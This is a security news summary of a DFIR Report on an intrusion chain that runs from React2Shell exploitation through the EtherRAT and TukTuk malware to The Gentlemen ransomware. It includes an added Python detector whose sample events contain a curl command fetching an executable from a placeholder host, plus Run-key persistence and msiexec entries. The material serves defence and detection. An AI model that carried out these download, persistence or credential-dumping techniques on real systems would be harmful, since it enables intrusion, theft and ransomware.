EtherRAT to TukTuk to The Gentlemen: Full Attack Chain Detailed in New DFIR Report
The DFIR Report dissects an intrusion where attackers exploited CVE-2025-55182 to deploy EtherRAT, evolved to the TukTuk framework, and ultimately deployed The Gentlemen ransomware.

The DFIR Report has published a detailed analysis of a sophisticated intrusion that began with exploitation of CVE-2025-55182 (React2Shell) on Linux servers and culminated in domain-wide deployment of The Gentlemen ransomware. The attack chain, active from December 2025 through April 2026, showcases a multi-stage evolution of malware families and a heavy reliance on blockchain and SaaS infrastructure for command-and-control (C2) resilience.
Initial access was achieved via CVE-2025-55182, a vulnerability in React-based web applications. The attackers deployed EtherRAT, a malware family first reported by Sysdig in December 2025. In this intrusion, EtherRAT was delivered through a malicious MSI installer masquerading as the Sysinternals RAMMap utility. The malware used the Ethereum blockchain via EtherHiding to dynamically update its C2 configuration, contacting 1rpc[.]io to retrieve configuration data hosted on the blockchain. At first, no active C2 was available, but the threat actor later updated the Ethereum-hosted config to point to a TryCloudflare tunnel, enabling active communications.
After establishing C2, the attackers conducted extensive reconnaissance, including system profiling, antivirus enumeration, domain checks, and LDAP-based user activity discovery. They then downloaded additional payloads from S3 buckets, deploying the TukTuk malware framework disguised as legitimate software binaries such as Greenshot, SyncTrayzor, DocFX, and the Cake build automation system. TukTuk established primary C2 channels through the SaaS platforms ClickHouse and Supabase, with backup channels capable of leveraging Ably, Dropbox, direct HTTP, or GitHub Issues. The framework also included a dead-drop resolver that used the Arweave blockchain to retrieve encrypted configuration blobs containing credential pools for all supported C2 transports.
With TukTuk in place, the threat actor began hands-on-keyboard activity, performing Kerberoasting, credential discovery targeting administrative accounts, and lateral movement using compromised service account credentials. They deployed the GoTo Resolve remote management tool across multiple systems, including servers and domain controllers. Over subsequent days, they expanded access through RDP, SMB, WinRM, NetExec, Mimikatz, and LSASS/NTDS dumping, while resetting privileged account passwords and conducting broad Active Directory reconnaissance.
Data exfiltration was carried out using Rclone to transfer large volumes of sensitive data to Wasabi cloud storage. Three days into the intrusion, ransomware operations began with the deployment of The Gentlemen ransomware on key servers. Prior to encryption, the attackers disabled Microsoft Defender protections, added AV exclusions, stopped virtual machines, deleted shadow copies, cleared event logs, and removed forensic artifacts. The intrusion ended with domain-wide ransomware deployment through a malicious Group Policy Object (GPO) that executed staged ransomware binaries within SYSVOL/NETLOGON via scheduled tasks across the environment.
The DFIR Report provides extensive detection engineering guidance, including monitoring for msiexec.exe executing from user directories and spawning unexpected children, hunting for curl downloads from the internet, and monitoring for unusual registry Run keys. The report also highlights the threat actor's use of multiple SaaS platforms and blockchain infrastructure, making their campaign resilient to traditional network defenses. This intrusion underscores the evolving sophistication of ransomware operations, combining initial exploitation, multi-stage malware deployment, and extensive use of legitimate services for C2 and data exfiltration.
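The three detections the report recommends, implemented as an added example over constructed Sysmon-style events (this is not code from The DFIR Report); the event field names, file names, SID and URL are assumptions:

```python
import re
# Constructed Sysmon-style events (not taken from the report) that exercise the three
# detections the DFIR Report recommends. Field names are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\RAMMap.msi" /qn'},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"cmd.exe /c whoami"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",  # normal elevated helper, not flagged
     "cmdline": r"msiexec.exe /V"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\s.exe https://example.invalid/s.exe"},
    {"type": "registry", "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\alice\AppData\Roaming\updater.exe"},
    {"type": "registry", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "value": r"C:\Windows\System32\SecurityHealthSystray.exe"},  # benign vendor entry
]

USER_DIR = re.compile(r"[a-z]:\\users\\", re.I)      # anything under a user profile
URL = re.compile(r"https?://", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run\\", re.I)
MSIEXEC_EXPECTED_CHILDREN = {"msiexec.exe"}           # msiexec normally only spawns itself
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, evidence) tuples for every event that matches a rule."""
    hits = []
    for e in events:
        if e["type"] == "process":
            image, parent = basename(e["image"]), basename(e["parent"])
            if image == "msiexec.exe" and USER_DIR.search(e["cmdline"]):
                hits.append(("msiexec_package_in_user_dir", e["cmdline"]))
            if parent == "msiexec.exe" and image not in MSIEXEC_EXPECTED_CHILDREN:
                hits.append(("msiexec_unexpected_child", image))
            if image == "curl.exe" and URL.search(e["cmdline"]):
                hits.append(("curl_internet_download", e["cmdline"]))
        elif e["type"] == "registry":
            if RUN_KEY.search(e["key"]) and USER_DIR.search(e["value"]):
                hits.append(("run_key_points_to_user_dir", e["value"]))
    return hits

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The msiexec-spawning-msiexec and HKLM vendor Run entry are included as benign controls so the rules can be checked for false positives before being turned into real SIEM queries.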
Trend Micro Research provides a detailed technical analysis of CVE-2025-55182, a CVSS 10.0 pre-authentication RCE in React Server Components, and reports that the vulnerability is being exploited in the wild in campaigns such as emerald and nuts, delivering Cobalt Strike, Nezha, FRP, Sliver, and Secret-Hunter payloads. The analysis also notes nearly 145 in-the-wild PoCs of varying quality, including WAF bypasses and mass-scanning tools, and clarifies misconceptions to help organizations deploy effective defenses.